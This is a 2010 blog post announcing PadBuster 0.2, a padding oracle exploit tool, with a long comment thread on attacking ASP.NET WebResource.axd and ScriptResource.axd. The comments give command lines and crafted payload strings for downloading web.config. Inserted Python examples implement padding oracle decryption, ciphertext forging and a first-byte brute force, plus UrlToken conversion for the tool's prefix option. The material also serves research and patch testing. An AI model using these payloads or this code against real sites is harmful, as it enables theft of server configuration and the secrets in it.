Tuesday, September 28, 2010

New Version of PadBuster Available for Download

A few weeks ago we released PadBuster, a tool for automating padding oracle exploits. Today we have released version 0.2, which includes some bug fixes and a few enhancements that are summarized below:

  • Support for HTTP Basic Authentication and HTTP/S Proxies
  • Encoding for .NET UrlTokens (essentially a web-safe Base64 encoding)
  • Logic for handling samples that do not include an IV (or use a NULL IV)

The .NET UrlToken encoding and NULL IV options are both especially useful when running PadBuster against sites that are vulnerable to the recent .NET Padding Oracle attack. There are also new options for running the tool in interactive mode (good for troubleshooting) and resuming a previous decryption in the event that the script gets killed in the middle of decrypting a large sample.

As with the previous version, feel free to provide feedback on potential improvements you would like to see. Version 0.3 is already in the works and promises to have more cool features.

Reader Comments (42)

That's great! Testing it right now and it is working like a charm. Testing to decrypt the ASP.Net viewstate with enableViewStateMac option on, custom errors set to off.
Thanks a lot.

September 28, 2010 | Unregistered Commenter Alex

I've modified 0.1 to work without an IV, however I got stuck because I thought the IV would be anything but null :)

Thanks for sharing; this code allows one to clearly see why and how exactly particular applications are vulnerable.

September 29, 2010 | Unregistered Commenter Alexander

How do I use this against .NET apps? I always get the usage screen. I tested my website and I get different responses for "http://www.mysite.com/notexistentpage.aspx" vs. the response to "http://www.mysite.com/WebResource.axd?d=wrongstring". I also opened the source code of my index.aspx and found "/WebResource.axd?d=PaEzkVsVRvDIevkuA1ssDnArJt8AfFhPdwdlccOscqKa&t=623190896729050001".

I tested it in different ways and I never got it working.

I was trying it like this: ./padBuster.pl "http://www.mysite.com/WebResource.axd?d=PaEzkVsVRvDIevkuA1ssDnArJt8AfFhPdwdlccOscqKa&t=623190896729050001" 16

In this case what is the [EncryptedSample]? Can you give me an example?

Also, what is the correct way to send a request? I mean, suppose I want to download web.config, I should send something like "q|~/web.config", right?

September 30, 2010 | Unregistered Commenter Alfred

After testing against a .NET app using -plaintext "q|~/myhiddenfile.txt", the encrypted result is "=�� � `z��f�x��q|~/myhiddenfile.txt",
which prevents me from downloading myhiddenfile.txt.
I think the .NET IV is always \x00 and does not depend on the previous block.

September 30, 2010 | Unregistered Commenter freesrvs

I mean .NET does not take the IV from the request; it's always null (\x00),
so the encrypted result must not include the IV value.

September 30, 2010 | Unregistered Commenter freesrvs

Thanks for the script.

I've been testing this against an ASP.NET app using 16 byte (AES) encryption and the script always fails to find byte 2. I'm running it with the -noiv and -encoding=3 options and trying to decrypt a WebResource.axd cipher. Any ideas?

September 30, 2010 | Unregistered Commenter Natan Yellin

@Alfred: The reason you are getting the usage screen is that you are missing a required command line argument (the encrypted sample). The encrypted sample is the encrypted value that must also be present in the Query String, Post Data, or Cookie values. So for the scenario you outlined, your command line should be as follows:

./padBuster.pl "http://www.mysite.com/WebResource.axd?d=PaEzkVsVRvDIevkuA1ssDnArJt8AfFhPdwdlccOscqKa&t=623190896729050001" PaEzkVsVRvDIevkuA1ssDnArJt8AfFhPdwdlccOscqKa 16

Note that the encrypted string is passed to PadBuster twice (once as part of the query string and once as part of the sample).

@freesrvs: Yes, you are correct. The encrypted payload that PadBuster generates is preceded by another block (the IV), which needs to be XORed against the intermediate value produced by the last block to generate your desired value. Exploiting ScriptResource to download an arbitrary file is not as simple as generating the payload and passing it as the parameter (for the exact reason you mention...the Framework does not use an IV on the first block). There are some workarounds that Rizzo and Duong mention in their original paper for dealing with this scenario.

@Natan: This is a known issue. The problem is that you are likely running against a server that has Custom Errors enabled. What's happening here is that WebResource.axd normally takes a payload that looks similar to the following:

s|WebForms.js

The above string represents the resource type (s) followed by the resource name (WebForms.js) and delimited with a pipe character (|). When you pass an invalid resource name, the handler throws a 404 response:

404: [HttpException]: Resource not found in assembly

This happens as you work backwards through the block manipulating each byte, which allows PadBuster to determine when the Padding Error (a 500 error) goes away. At least that's what happens until you get to byte #2. Note that this byte is the pipe character, which is a required delimiter. If this delimiter is not present, the handler throws a 500 response:

500: [HttpException]: This is an invalid webresource request

Unfortunately when custom errors are enabled, all 500 errors look identical...so PadBuster is unable to tell the difference between this error and the Padding Exception which occurs on the other 255 requests.

The good news however, is that there is a pretty simple workaround. If you re-run the same command but also use the -prefix option to pass the HEX encoded equivalent of your un-altered encrypted string, PadBuster will always pass this unaltered block as the first block of each request so you'll be able to decrypt the string with no problem. So for example, the string M48vAB4P7iimjh7inLsvYg2 (NetUrlToken Encoded) should be converted to ASCII HEX Encoding (338F2F001E0FEE28A68E1EE29CBB2F62) and passed as the -prefix option (keep the rest of your command the same). Try this out and it should work.

September 30, 2010 | Unregistered Commenter Brian Holyfield

@Brian thanks for the fast answer, very helpful. I tried it, but I always get this response: "ERROR: Encrypted Bytes must be evenly divisible by Block Size (16). Double check the Encoding and Block Size." One thing that caught my attention is that the value passed in argument "d", which we should use as the encrypted sample, is 44 characters long, which is not divisible by 18 or 8. I also noted that all values passed to "d" on my servers end with "amp;". In my previous post I replaced my values to protect myself, but now I will send the real ones to see if that helps identify the issue. Opening my website in the browser and viewing the source of index.aspx I have:

"/WebResource.axd?d=0X4s9hj32wTEa6qrkDU3nA2&t=634192562657570720" type="text

/ScriptResource.axd?d=N950sRNXiREcgmBGy7n3U6jYnPpMDE-EHlj61ni1bngnmy4kzdAn2YAIooXYJqXO_TGhV9YLO47obLJkjI2tB8_PNi8SUo0BSPSz7-ijmcY1&t=ffffffffe355792b" type="text

Does this help? Also, shouldn't we use encoding 3 (.NET UrlToken), since it's a .NET application?

I tried with 8 -encoding 3 and with 16 -encoding 3 and I always get:

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 256 500 3026 N/A
-------------------------------------------------------

ERROR: All of the responses were identical.

Double check the Block Size and try again.

Which is not true: if I request https://www.mysite.com/noexistent.aspx I get:

"Server Error in '/' Application.

The resource cannot be found.

Description: HTTP 404. The resource you are looking for (or one of its dependencies) could have been removed, had its name changed, or is temporarily unavailable. Please review the following URL and make sure that it is spelled correctly.

Requested URL: /noexistent.aspx"

While requesting http://www.mysite.com/WebResource.axd?d=test returns:

"Server Error in '/' Application.

Runtime Error

Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.

Details: To enable the details of this specific error message to be viewable on remote machines, please create a tag within a "web.config" configuration file located in the root directory of the current web application. This tag should then have its "mode" attribute set to "Off".

Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's configuration tag to point to a custom error page URL."

Any idea what my problem is?

Thanks

October 1, 2010 | Unregistered Commenter Alfred

@Alfred: Make sure you are using "-encoding 3" and "-noiv" options. If you still have problems send an email to [email protected] so I can troubleshoot the problem with you on a private thread. We can post the solution back here if it makes sense afterwards.

October 1, 2010 | Unregistered Commenter Brian Holyfield

I'm having the same problems, just like Alfred.

October 1, 2010 | Unregistered Commenter n1

@freesrvs: Actually there are several ways to download the Web.config.

One is to use as the first block a block that starts with "R" after decryption.
In this example, "Rlksdjh88098788|~/web.config", R followed by garbage is valid and leads to file access.

This works because the string is processed as a NameValueCollection type and the first byte is checked to get the resource to download, e.g. str[0] = "R".

Actually I'm testing some more efficient methods; I'll keep you updated.

October 1, 2010 | Unregistered Commenter Giorgio Fedon

I have to be more precise about the above post.

A valid exploit request with garbage is the following one:

"r#jduejgarbageloajhjksj|||~/web.config"

October 1, 2010 | Unregistered Commenter Giorgio Fedon

If you do not want to brute force, the other interesting exploit is that if you have Framework 3.5 SP1, there may be different resources that are accessed via the "q|~/img/document.js" method.

In this way you can use an existing encrypted block and add resources with a comma:

"q|~/img/document.js,~/Web.config"

The response will hold both files.

October 1, 2010 | Unregistered Commenter Giorgio Fedon

Next, last but not least, you can issue multiple requests.

"q|~/img/document.js|#|||~/web.config"

Maybe this is the most useful, because you can get rid of some flags. Note that all must be valid resources for this to work.

October 1, 2010 | Unregistered Commenter Giorgio Fedon

Nice Giorgio, you're doing a great job. MS, you must think more and more about securing people's data.

October 1, 2010 | Unregistered Commenter freesrvs

@Brian thanks for the answer, it helped in some way. However, it never completes; I always get output like this:

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21547

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 404 1510 N/A
2 ** 255 500 3026 N/A
-------------------------------------------------------

Enter an ID that matches the padding error
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (110) [Byte 16]
[+] Success: (107) [Byte 15]
[+] Success: (119) [Byte 14]
[+] Success: (101) [Byte 13]
[+] Success: (97) [Byte 12]
[+] Success: (111) [Byte 11]
[+] Success: (107) [Byte 10]
[+] Success: (105) [Byte 9]
[+] Success: (95) [Byte 8]
[+] Success: (67) [Byte 7]
[+] Success: (94) [Byte 6]
[+] Success: (110) [Byte 5]
[+] Success: (104) [Byte 4]
[+] Success: (89) [Byte 3]
ERROR: No matching response on [Byte 2]
Do you want to start this block over? (Yes/No)? [y/n/a] : y
INFO: Switching to interactive mode
[+] Success: (110) [Byte 16]
Do you want to use this value (Yes/No/All)? [y/n/a] : a
[+] Success: (107) [Byte 15]
[+] Success: (119) [Byte 14]
[+] Success: (101) [Byte 13]
[+] Success: (97) [Byte 12]
[+] Success: (111) [Byte 11]
[+] Success: (107) [Byte 10]
[+] Success: (105) [Byte 9]
[+] Success: (95) [Byte 8]
[+] Success: (67) [Byte 7]
[+] Success: (94) [Byte 6]
[+] Success: (110) [Byte 5]
[+] Success: (104) [Byte 4]
[+] Success: (89) [Byte 3]
ERROR: No matching response on [Byte 2]
Do you want to start this block over? (Yes/No)? [y/n/a] : a
INFO: Switching to interactive mode
[+] Success: (110) [Byte 16]

And it stays in this infinite loop. Is this a well-known problem?

Thanks

October 1, 2010 | Unregistered Commenter Alfred

@Giorgio Fedon interesting. Can you please give an example of downloading web.config with padBuster? I mean, how should I pass the parameter "r#jduejgarbageloajhjksj|||~/web.config"? Also, in the case of "q|~/img/document.js,~/Web.config", I believe that /img/document.js is not a default file, right? Can we replace it with any file? Even, for example, an .aspx to read the source code?

I got curious: is it possible to download files (web.config) even with .NET Framework 2.x? I see a few people saying it's not possible.

Thanks

October 1, 2010 | Unregistered Commenter Alfred

Still gives garbage :(

����Û:����0auKq|~/mysenesitvefile.js|#|||~/web.config

This prevents downloading any of the files.

October 1, 2010 | Unregistered Commenter freesrvs

@Alfred: You are having the exact same issue that @Natan asked about above. Please see my response to him as this will solve your problem.

@freesrvs: There is an extra step required to get this exploit to work and the current version of PadBuster alone is NOT enough to get you there. Version 0.3 of PadBuster has a brute force option that will do exactly what @Giorgio has suggested...which is how you can download the web.config. We intentionally omitted this feature from the current version as we felt it was too soon to release the only public full working exploit for file downloads. The good news is that we are planning to release this feature in the next version, which will be out soon.

October 1, 2010 | Unregistered Commenter Brian Holyfield
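The NULL-IV problem that freesrvs, Giorgio and Brian are circling in the comments above, put into running code. This is an added example, not PadBuster's code and not from the original post: a toy CBC server that always decrypts with a zero IV and leaks a padding-error signal; `recover_intermediate` is the decrypt step PadBuster performs (the probe's first block playing the IV role, as -prefix or PadBuster's own IV block does under -noiv); `forge_ciphertext` is encrypt mode, building blocks backwards from a random last block; `forge_with_first_byte` is the re-roll-until-it-fits brute force Giorgio describes and Brian says v0.3 automates. The block cipher, its key, and the use of an 'r' resource-type byte with a `|||~/web.config` tail (shape copied from Giorgio's comment) are constructed assumptions; nothing here reflects how ScriptResource.axd actually parses its argument.

```python
import random

BLOCK = 16
NULL_IV = bytes(BLOCK)

# Toy 16-byte block cipher, constructed for this example: key XOR, an affine byte
# substitution (odd multiplier => a permutation of 0..255), then a 3-byte rotation.
# No security at all; it stands in for AES because the attack never looks inside it.
_KEY = bytes(range(0x10, 0x10 + BLOCK))
_SBOX = bytes((i * 167 + 59) & 0xFF for i in range(256))
_INV_SBOX = bytes(_SBOX.index(v) for v in range(256))


def _xor(a: bytes, b: bytes) -> bytes:
    return (int.from_bytes(a, "big") ^ int.from_bytes(b, "big")).to_bytes(len(a), "big")


def toy_decrypt_block(c: bytes) -> bytes:
    s = c[-3:] + c[:-3]                       # undo the rotation, then the S-box and key
    return _xor(s.translate(_INV_SBOX), _KEY)


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def server_decrypt(ct: bytes) -> bytes:
    """Server side as the thread describes it: CBC with a fixed NULL IV, so the first
    plaintext block is D_K(C1) and nothing in the request can shift it."""
    if not ct or len(ct) % BLOCK:
        raise ValueError("ciphertext length")
    out, prev = [], NULL_IV
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out.append(_xor(toy_decrypt_block(blk), prev))
        prev = blk
    return pkcs7_unpad(b"".join(out))


def padding_oracle(ct: bytes) -> bool:
    """One bit per request: did the padding check pass? (What PadBuster's response
    analysis tells apart, e.g. a 404 from the handler vs. the padding 500.)"""
    try:
        server_decrypt(ct)
        return True
    except ValueError:
        return False


def recover_intermediate(oracle, block: bytes) -> bytes:
    """Learn D_K(block) byte by byte. The probe is prefix || block, so the prefix
    acts as the IV for `block` exactly as the -prefix option does on the wire."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        prefix = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            prefix[j] = inter[j] ^ pad          # pin already-known bytes to the pad value
        for guess in range(256):
            prefix[pos] = guess
            if not oracle(bytes(prefix) + block):
                continue
            if pos == BLOCK - 1:                # reject a false hit such as ...02 02
                probe = bytearray(prefix)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + block):
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle gave no hit for byte %d" % pos)
    return bytes(inter)


def forge_ciphertext(oracle, controlled: bytes, rng=None) -> bytes:
    """Encrypt mode: random last block, then work backwards so every block after the
    first decrypts to `controlled`. The first block decrypts to D_K(C1): not ours to pick."""
    rng = rng or random.Random()
    padded = pkcs7_pad(controlled)
    chain = [bytes(rng.getrandbits(8) for _ in range(BLOCK))]
    for p in reversed([padded[i:i + BLOCK] for i in range(0, len(padded), BLOCK)]):
        chain.insert(0, _xor(recover_intermediate(oracle, chain[0]), p))
    return b"".join(chain)


def forge_with_first_byte(oracle, wanted: int, tail: bytes, rng=None, max_attempts=10000):
    """The brute force from the thread: re-roll until the uncontrolled first block
    happens to start with the wanted resource-type byte (about 1 try in 256)."""
    rng = rng or random.Random()
    for attempt in range(1, max_attempts + 1):
        ct = forge_ciphertext(oracle, tail, rng)
        if recover_intermediate(oracle, ct[:BLOCK])[0] == wanted:
            return ct, attempt
    raise RuntimeError("no hit within %d attempts" % max_attempts)


if __name__ == "__main__":
    ct, tries = forge_with_first_byte(padding_oracle, ord("r"), b"|||~/web.config")
    print("attempts:", tries)
    print("server sees:", server_decrypt(ct))
```

Every attempt costs two full block recoveries (roughly 4,000 oracle requests here), which is why Brian's reply treats this as a feature to be automated rather than run by hand; Giorgio's comma and `|#|` variants avoid the re-roll entirely by reusing an intercepted first block that already starts with a valid type byte.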

@Brian, does this MS patch (MS10-070) effectively solve the problem without any code change?

Also, I believe everyone may be interested: a new version of POET was released. I believe it should allow downloading files, etc. If someone has a 64-bit box, could they test it?

http://netifera.com/download/poet/poet-1.0.1-linux-x86_amd64.jar

Thanks

October 1, 2010 | Unregistered Commenter Alfred

I see a lot of people saying that Web.Config is only downloadable via ScriptResource.axd; is that true? I opened my index.aspx and I can't find any reference to ScriptResource.axd. How can I find the encryption sample for this resource?

Thanks for the nice forum and stuff.

October 1, 2010 | Unregistered Commenter Alfred

@Brian, I did what you suggested to Natan; I hex-encoded my encryption sample, calling it this way:

./padBuster.pl "http://www.mysite.com/WebResource.axd?d=LrEzkkIVRvYgevkAu1ssDpnrJt7EfFh4OwdlcBjGcqg1&t=634190276720650178" "LrEzkkIVRvYgevkAu1ssDpnrJt7EfFh4OwdlcBjGcqg1" 16 -encoding 3 -noiv -prefix "4c72457a6b6b49565276596765766b417531737344706e724a743745664668344f77646c63426a4763716731"

And now I have no more problems with [Byte 2], but instead I have them with [Byte 14], or [Byte 16], ....

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21547

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 500 N/A
2 ** 255 500 3026 N/A
-------------------------------------------------------

Enter an ID that matches the padding error
NOTE: The ID# marked with ** is recommended :
Enter an ID that matches the padding error
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (140) [Byte 16]
[+] Success: (221) [Byte 15]
ERROR: No matching response on [Byte 14]
Do you want to start this block over? (Yes/No)? [y/n/a] : a
INFO: Switching to interactive mode

ERROR: No matching response on [Byte 16]
Do you want to start this block over? (Yes/No)? [y/n/a] : Do you want to start this block over? (Yes/No)? [y/n/a] : a
INFO: Switching to interactive mode
ERROR: No matching response on [Byte 16]
Do you want to start this block over? (Yes/No)? [y/n/a] :

Thanks

October 1, 2010 | Unregistered Commenter Alfred

@Alfred: You have the wrong prefix value. You need to decode the Base64 value before you HEX encode it (you HEX encoded the Base64 string).

So for a .NET URL Token of "LrEzkkIVRvYgevkAu1ssDpnrJt7EfFh4OwdlcBjGcqg1", the HEX encoded equivalent is 2EB13392421546F6207AF900BB5B2C0E99EB26DEC47C58783B07657018C672A8.

In hindsight, the encoding format used for the -prefix option should probably default to whatever encoding is specified with the -encoding switch to make this feature easier to use. I'll add that to the list of enhancements for v0.3.

As for your question related to the patch, the Microsoft patch for this issue *should* work without any code changes. I have not tested the patch so I cannot vouch for its effectiveness, but based on what I have read it does appear to correct the issue.

Finally, regarding the version 1.0.1 of POET, I have not run this version but my understanding is that it is just an updated build of the previous POET for certain 64-bit systems. Let me know if that is not the case. I believe you are correct that the web.config can only be downloaded via ScriptResource.axd as that is the only handler that I have been able to get the exploit working against. That being said, it is very possible that other file download vectors may exist...I just don't know for sure.

October 1, 2010 | Unregistered Commenter Brian Holyfield
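The -prefix conversion Brian explains twice above (once for Natan, once correcting Alfred's command) in code. This is an added example, not PadBuster's code and not from the original post: it implements the .NET UrlToken encoding from Brian's description (web-safe Base64 with the '=' padding replaced by a count digit), derives the -prefix value as the hex of the decoded bytes, and shows the mistake in Alfred's command, which is the hex of the token's characters instead. The function names are this example's own; the tokens and hex strings are the ones quoted in the comments.

```python
import base64
import binascii

# .NET UrlToken (HttpServerUtility.UrlTokenEncode) as described in the thread: standard
# Base64 with '+' -> '-' and '/' -> '_', trailing '=' removed and a single digit (0, 1
# or 2) appended saying how many '=' were removed. Added example, not PadBuster's code.


def urltoken_decode(token: str) -> bytes:
    """Decode a .NET UrlToken string into the raw ciphertext bytes."""
    if not token:
        return b""
    pad_count = int(token[-1])                      # the count digit, never part of the data
    if pad_count not in (0, 1, 2):
        raise ValueError("UrlToken must end in a padding digit 0, 1 or 2")
    body = token[:-1].replace("-", "+").replace("_", "/")
    return base64.b64decode(body + "=" * pad_count, validate=True)


def urltoken_encode(data: bytes) -> str:
    """Inverse of urltoken_decode (the format PadBuster emits with -encoding 3)."""
    b64 = base64.b64encode(data).decode("ascii")
    stripped = b64.rstrip("=")
    return stripped.replace("+", "-").replace("/", "_") + str(len(b64) - len(stripped))


def prefix_hex_for_padbuster(token: str) -> str:
    """What -prefix expects: hex of the *decoded* bytes of the unaltered sample."""
    return binascii.hexlify(urltoken_decode(token)).decode("ascii").upper()


def hex_of_token_text(token: str) -> str:
    """The mistake in the thread: hex of the token's ASCII characters, not its bytes."""
    return binascii.hexlify(token.encode("ascii")).decode("ascii")


def block_count(token: str, block_size: int) -> int:
    """Cipher blocks in the sample, or -1 when the decoded length does not align
    (the 'Encrypted Bytes must be evenly divisible by Block Size' check)."""
    n = len(urltoken_decode(token))
    return n // block_size if n % block_size == 0 else -1


if __name__ == "__main__":
    # Tokens quoted in Brian Holyfield's comments above.
    for tok in ("M48vAB4P7iimjh7inLsvYg2", "LrEzkkIVRvYgevkAu1ssDpnrJt7EfFh4OwdlcBjGcqg1"):
        print(tok, "->", block_count(tok, 16), "block(s); -prefix", prefix_hex_for_padbuster(tok))
```

The 44-character token Alfred puzzled over decodes to 32 bytes, i.e. exactly two AES blocks; the character count of a UrlToken says nothing about block alignment until it has been decoded.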

@Giorgio Fedon can you explain more about how to brute force?
How can I brute force until the required message is decrypted?

October 1, 2010 | Unregistered Commenter freesrvs

@Brian, thanks for your help, it worked. I noted that on my 3 different web servers I always get the same final response from the tool: "[+] Decrypted value (ASCII): s|WebUIValidation.js". If I don't have DotNetNuke installed and there is no public exploit to download web.config, what can hackers do with it?

Even if there is a public exploit (I haven't tested the new version of POET because I don't have a 64-bit box, but the release number is version 1.1, different from all the others available on the author's website) to download Web.Config, and I have no DotNetNuke, is there something a hacker is able to do to compromise my servers?

Thanks

October 1, 2010 | Unregistered Commenter Alfred
